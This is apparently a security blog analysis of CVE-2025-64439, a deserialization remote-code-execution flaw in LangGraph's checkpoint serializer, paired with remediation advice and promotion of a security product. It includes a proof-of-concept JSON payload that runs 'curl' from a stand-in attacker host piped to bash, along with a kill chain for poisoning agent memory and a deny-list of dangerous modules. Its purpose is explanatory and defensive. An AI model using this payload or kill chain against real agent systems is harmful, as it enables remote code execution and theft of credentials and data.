A technical autopsy of CVE-2025-64439 (CVSS 9.8), a critical RCE in LangGraph’s checkpoint serializer. We analyze the JSON deserialization logic flaw, the kill chain for poisoning AI Agent memory, and AI-driven defense strategies.

In the architectural evolution of 2026, Agentic AI has transitioned from experimental Jupyter notebooks to mission-critical enterprise infrastructure. Frameworks like LangGraph have become the backbone of these systems, enabling developers to build stateful, multi-actor applications that can pause, resume, and iterate on complex tasks.

However, the disclosure of CVE-2025-64439 (CVSS Score 9.8, Critical) exposes a catastrophic vulnerability in the very mechanism that makes these agents “smart”: their long-term memory.



This is not a typical web vulnerability. It is a supply chain nuclear option targeting the AI persistence layer. The flaw resides within the langgraph-checkpoint library—specifically in how the JsonPlusSerializer handles data recovery. By exploiting this, attackers can inject malicious JSON payloads into an Agent’s state storage (e.g., SQLite, Postgres), triggering Remote Code Execution (RCE) the moment the system attempts to “remember” a previous state to resume a workflow.

For the hardcore AI security engineer, the implication is stark: The “State” is the new “Input.” If an attacker can influence the serialized history of an agent, they can execute arbitrary code on the inference server. This article dissects the source code to reveal the mechanics of this “Memory Poisoning” kill chain.

Vulnerability Intelligence Card

| Metric | Intelligence Detail |
|---|---|
| CVE Identifier | CVE-2025-64439 |
| Target Component | langgraph-checkpoint (Core Library) & langgraph-checkpoint-sqlite |
| Affected Versions | langgraph-checkpoint < 3.0.0; langgraph-checkpoint-sqlite <= 2.1.2 |
| Vulnerability Class | Insecure Deserialization (CWE-502) leading to RCE |
| CVSS v3.1 Score | 9.8 (Critical) (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| Attack Vector | Poisoning Checkpoint DB, Man-in-the-Middle on State Transfer |

Technical Deep Dive: The JsonPlusSerializer Trap

To understand CVE-2025-64439, one must understand how LangGraph handles persistence. Unlike a stateless LLM call, an Agent needs to save its stack—variable values, conversation history, and execution steps—so it can resume later. This is handled by Checkpointers.



LangGraph attempts to use msgpack for efficiency. However, because Python objects in AI workflows are often complex (custom classes, Pydantic models), it implements a robust fallback mechanism: JSON Mode, handled by JsonPlusSerializer.

1. The Fatal “Constructor” Logic

The vulnerability is not in using JSON, but in how LangGraph extends JSON to support complex Python types. To reconstruct a Python object from JSON, the serializer looks for a specific schema containing “magic keys”:

- `lc`: The LangChain/LangGraph version identifier (e.g., `2`).

- `type`: The object type (specifically the string `"constructor"`).

- `id`: A list representing the module path to the class or function.

- `kwargs`: Arguments to pass to that constructor.

The Flaw: In affected versions, the deserializer trusts the id field implicitly. It does not validate whether the module specified is a “safe” LangGraph component or a dangerous system library. It dynamically imports the module and executes the constructor with the provided arguments.

2. Forensic Code Reconstruction

Based on the patch analysis, the vulnerable logic in langgraph/checkpoint/serde/jsonplus.py resembles the following pattern:

```python
import importlib

# Simplified vulnerable logic (reconstructed for illustration)
def _load_constructor(value):
    # DANGEROUS: no allow-list check on "id";
    # "id" comes directly from the JSON payload
    module_path = value["id"][:-1]
    class_name = value["id"][-1]

    # Dynamic import of ANY module
    module = importlib.import_module(".".join(module_path))
    cls = getattr(module, class_name)

    # Execution of the constructor with attacker-controlled kwargs
    return cls(**value["kwargs"])
```

This logic turns the deserializer into a generic “Gadget Chain” executor, similar to the infamous Java ObjectInputStream vulnerabilities, but easier to exploit because the payload is human-readable JSON.
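One way to close this gap is to check the `id` path against an explicit allow-list before anything is imported. The sketch below is a minimal illustration under that assumption; `ALLOWED_CONSTRUCTORS` and `load_constructor_safely` are hypothetical names chosen for this example, not the identifiers used in the patched langgraph-checkpoint release.

```python
import importlib

# Hypothetical allow-list: (module path, attribute name) pairs the application trusts.
ALLOWED_CONSTRUCTORS = {
    ("fractions", "Fraction"),
    ("datetime", "timedelta"),
}


def load_constructor_safely(value: dict):
    """Rebuild an object from a constructor-style dict, but only if it is allow-listed."""
    ident = value.get("id")
    if (
        not isinstance(ident, list)
        or len(ident) < 2
        or not all(isinstance(part, str) for part in ident)
    ):
        raise ValueError("malformed constructor id")

    key = (".".join(ident[:-1]), ident[-1])
    if key not in ALLOWED_CONSTRUCTORS:
        # Refuse before any import happens, so no attacker-chosen module is loaded.
        raise ValueError(f"constructor not allow-listed: {key[0]}.{key[1]}")

    module = importlib.import_module(key[0])
    cls = getattr(module, key[1])
    return cls(**value.get("kwargs", {}))
```

With this check in place, a payload whose `id` names `subprocess.check_output` is rejected with a `ValueError` before `importlib` is ever invoked, while an allow-listed type such as `fractions.Fraction` is still reconstructed.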

The Kill Chain: Memory Poisoning

How does an attacker actually get this JSON into the system? The attack surface is broader than it appears.

Phase 1: Injection (The Poison)

The attacker needs to write to the database where checkpoints are stored.

- Scenario A (Direct Input): If the Agent accepts user input that is stored raw into the state (e.g., “Summarize this text: [MALICIOUS_JSON]”), and the application's serialization logic is flawed, the payload may be written to the DB.

- Scenario B (SQL Injection Pivot): An attacker uses a lower-severity SQL Injection (like CVE-2025-8709) to modify the `checkpoints` table in SQLite/Postgres directly, inserting the RCE payload into the `thread_ts` or state blob.

Phase 2: Weaponization (The Payload)

The attacker constructs a JSON payload that mimics a valid LangGraph object but points to subprocess.

Concept PoC Payload:

```json
{
  "lc": 2,
  "type": "constructor",
  "id": ["subprocess", "check_output"],
  "kwargs": {
    "args": ["/bin/bash", "-c", "curl http://c2.attacker.com/shell.sh | bash"],
    "shell": false,
    "text": true
  }
}
```

Phase 3: Detonation (The Resume)

The code does not execute immediately upon injection. It executes when the Agent reads the state.

- User (or Attacker) triggers the Agent to resume a thread (e.g., “Continue previous task”).

- LangGraph queries the DB for the latest checkpoint.

- The `JsonPlusSerializer` parses the blob.

- It encounters the `constructor` type.

- It imports `subprocess` and runs `check_output`.

- RCE Achieved.
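The gap between write and execution can be reproduced harmlessly. The following sketch is a simulation under stated assumptions, not LangGraph code: `naive_load` imitates the unsafe pattern, the in-memory SQLite table and its two columns are invented for the demo, and the stored blob points at the harmless `fractions.Fraction` rather than a system call.

```python
import importlib
import json
import sqlite3


def naive_load(obj):
    """Imitation of the unsafe pattern: import and call whatever "id" names."""
    if isinstance(obj, dict) and obj.get("type") == "constructor":
        *module_path, name = obj["id"]
        target = getattr(importlib.import_module(".".join(module_path)), name)
        return target(**obj.get("kwargs", {}))
    return obj


# Hypothetical, simplified checkpoint store (not the real LangGraph schema).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE checkpoints (thread_id TEXT, checkpoint TEXT)")

# Write phase: the blob is stored as inert text; nothing is imported or called.
blob = json.dumps({
    "lc": 2,
    "type": "constructor",
    "id": ["fractions", "Fraction"],  # benign stand-in for an attacker-chosen callable
    "kwargs": {"numerator": 1, "denominator": 3},
})
db.execute("INSERT INTO checkpoints VALUES (?, ?)", ("thread-1", blob))

# Resume phase: reading the checkpoint is what triggers the import and the call.
(stored,) = db.execute(
    "SELECT checkpoint FROM checkpoints WHERE thread_id = ?", ("thread-1",)
).fetchone()
restored = naive_load(json.loads(stored))
print(type(restored).__name__, restored)  # Fraction 1/3
```

The insert succeeds silently, which is why write-time checks and scanners that only watch the injection request tend to miss this class of flaw.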

Impact Analysis: The AI Brain Heist

Compromising the server running LangGraph is significantly more dangerous than compromising a standard web server due to the nature of AI workloads.

- Credential Harvesting: AI Agents rely on environment variables for API keys (`OPENAI_API_KEY`, `ANTHROPIC_API_KEY`, `AWS_ACCESS_KEY`). RCE grants immediate access to `os.environ`.

- Vector DB Exfiltration: Agents often have read/write access to Pinecone, Milvus, or Weaviate. An attacker can dump proprietary knowledge bases (RAG data).

- Model Weight Infection: If the server hosts local models (e.g., using Ollama), attackers can poison the model weights or modify the inference pipeline.

- Lateral Movement: LangGraph agents are designed to do things—call APIs, query databases, send emails. The attacker inherits all the permissions and tools assigned to the Agent.

AI-Driven Defense: The Penligent Advantage

Detecting CVE-2025-64439 is a nightmare for legacy DAST (Dynamic Application Security Testing) tools.

- Protocol Blindness: Scanners look for HTML forms and URL parameters. They do not understand the internal binary or JSON serialization protocols used by Python AI frameworks.

- State Blindness: The vulnerability triggers on read, not write. A scanner might inject a payload, see no immediate error, and record a false negative.

This is where Penligent.ai represents a paradigm shift for AI Application Security. Penligent utilizes Deep Dependency Analysis and Logic Fuzzing:

- Full-Stack AI Fingerprinting

Penligent’s agents go beyond `pip freeze`. They scan development and production containers to identify the exact versions and hashes of langgraph, langchain-core, and langgraph-checkpoint. They recognize the vulnerable dependency chain even if it is nested deep within a Docker image, flagging the presence of `JsonPlusSerializer` without allow-lists.

- Serialization Protocol Fuzzing

Penligent understands the “Language of Agents.” It can generate specific probing payloads containing serialization markers (like lc=2 and benign constructor calls).

- Non-Destructive Probe: Instead of a reverse shell, Penligent injects a payload that triggers a benign DNS lookup (e.g., using `socket.gethostbyname`).

- Validation: If the Penligent OOB listener receives the DNS query when the Agent state is loaded, the vulnerability is confirmed with 100% certainty.

- State Store Auditing

Penligent connects to the persistence layer (SQLite/Postgres) used by your AI Agents. It scans the stored blobs for “Dormant Payloads”—malicious JSON structures waiting to be deserialized—allowing you to sanitize your database before an incident occurs.

Remediation and Hardening Handbook

If you are building with LangGraph, immediate remediation is required.

1. Upgrade Dependencies (The Fix)

Upgrade langgraph-checkpoint to version 3.0.0 or higher immediately.

- Mechanism: The new version removes the default support for the `constructor` type in JSON serialization or enforces a strict, empty-by-default allow-list. It forces developers to explicitly register safe classes for serialization.
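A quick way to confirm which environments still need the upgrade is to compare the installed version against 3.0.0. The sketch below assumes plain numeric release versions such as `2.1.2` and uses hypothetical helper names (`is_vulnerable_version`, `check_installed`); a production check would more likely rely on the `packaging` library or a dependency scanner, which also handle pre-release tags correctly.

```python
import re
from importlib import metadata

FIXED_VERSION = (3, 0, 0)  # first fixed langgraph-checkpoint release named in this article


def is_vulnerable_version(version: str) -> bool:
    """Return True if a numeric version string sorts below 3.0.0."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    parts += [0] * (3 - len(parts))  # pad short versions such as "3.0"
    return tuple(parts) < FIXED_VERSION


def check_installed(package: str = "langgraph-checkpoint") -> str:
    """Describe the installed package version, or report that it is absent."""
    try:
        installed = metadata.version(package)
    except metadata.PackageNotFoundError:
        return f"{package}: not installed"
    status = "VULNERABLE, upgrade required" if is_vulnerable_version(installed) else "patched"
    return f"{package} {installed}: {status}"


if __name__ == "__main__":
    print(check_installed())
```

Running the check inside each container image, rather than only on a developer machine, helps catch copies of the library that were pinned transitively.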

2. Forensic Database Cleaning

If you suspect your system was exposed, you cannot just patch the code; you must clean the data.

- Action: Script a tool to iterate through your `checkpoints` table. Parse every JSON blob.

- Signature: Look for `{"type": "constructor", "id": ["subprocess", ...]}` or any `id` pointing to `os`, `sys`, or `shutil`.

- Purge: Delete any thread/checkpoint containing these signatures.
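The three steps above can be sketched as a small audit script. It is illustrative only: the table and column names (`checkpoints`, `thread_id`, `checkpoint`), the `SUSPICIOUS_MODULES` set, and both helper names are assumptions that need to be adapted to the actual schema, and blobs that are not valid JSON (for example msgpack-encoded ones) are skipped rather than inspected.

```python
import json
import sqlite3

# Assumed deny-list of top-level modules; extend it for your environment.
SUSPICIOUS_MODULES = {"subprocess", "os", "sys", "shutil"}


def find_suspicious_ids(node):
    """Recursively collect "id" paths of constructor objects that name a suspicious module."""
    hits = []
    if isinstance(node, dict):
        ident = node.get("id")
        if node.get("type") == "constructor" and isinstance(ident, list) and ident:
            if str(ident[0]).split(".")[0] in SUSPICIOUS_MODULES:
                hits.append(ident)
        for child in node.values():
            hits.extend(find_suspicious_ids(child))
    elif isinstance(node, list):
        for child in node:
            hits.extend(find_suspicious_ids(child))
    return hits


def audit_checkpoints(conn: sqlite3.Connection):
    """Return (thread_id, id_path) pairs for every flagged blob. The schema is hypothetical."""
    flagged = []
    for thread_id, blob in conn.execute("SELECT thread_id, checkpoint FROM checkpoints"):
        try:
            parsed = json.loads(blob)
        except (TypeError, ValueError):
            continue  # not JSON (e.g. binary msgpack); needs a different parser
        flagged.extend((thread_id, ident) for ident in find_suspicious_ids(parsed))
    return flagged
```

Flagged threads are best reviewed before deletion. A deny-list like this is a triage aid for finding known-bad signatures, not a substitute for the allow-list enforced by the patched serializer.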

3. Network & Runtime Isolation

- Egress Filtering: AI Agents should not have unrestricted Internet access. Block outbound connections to unknown IPs to prevent reverse shells.

- Database Isolation: Ensure the SQLite file or Postgres instance storing checkpoints is not accessible via public interfaces.

- Least Privilege: Run the Agent service with a user that has no shell access (`/bin/false`) and strictly scoped IAM roles.

Conclusion

CVE-2025-64439 serves as a wake-up call for the AI industry. We are building systems that are increasingly autonomous and stateful, but we are building them on fragile foundations of trust. An Agent’s memory is a mutable, weaponizable surface.

As we move toward AGI-adjacent systems, security engineering must evolve. We must treat “State” with the same suspicion we treat “User Input.” Validating serialization logic, auditing dependencies, and employing AI-native security tools like Penligent are no longer optional—they are the prerequisites for survival in the age of Agentic AI.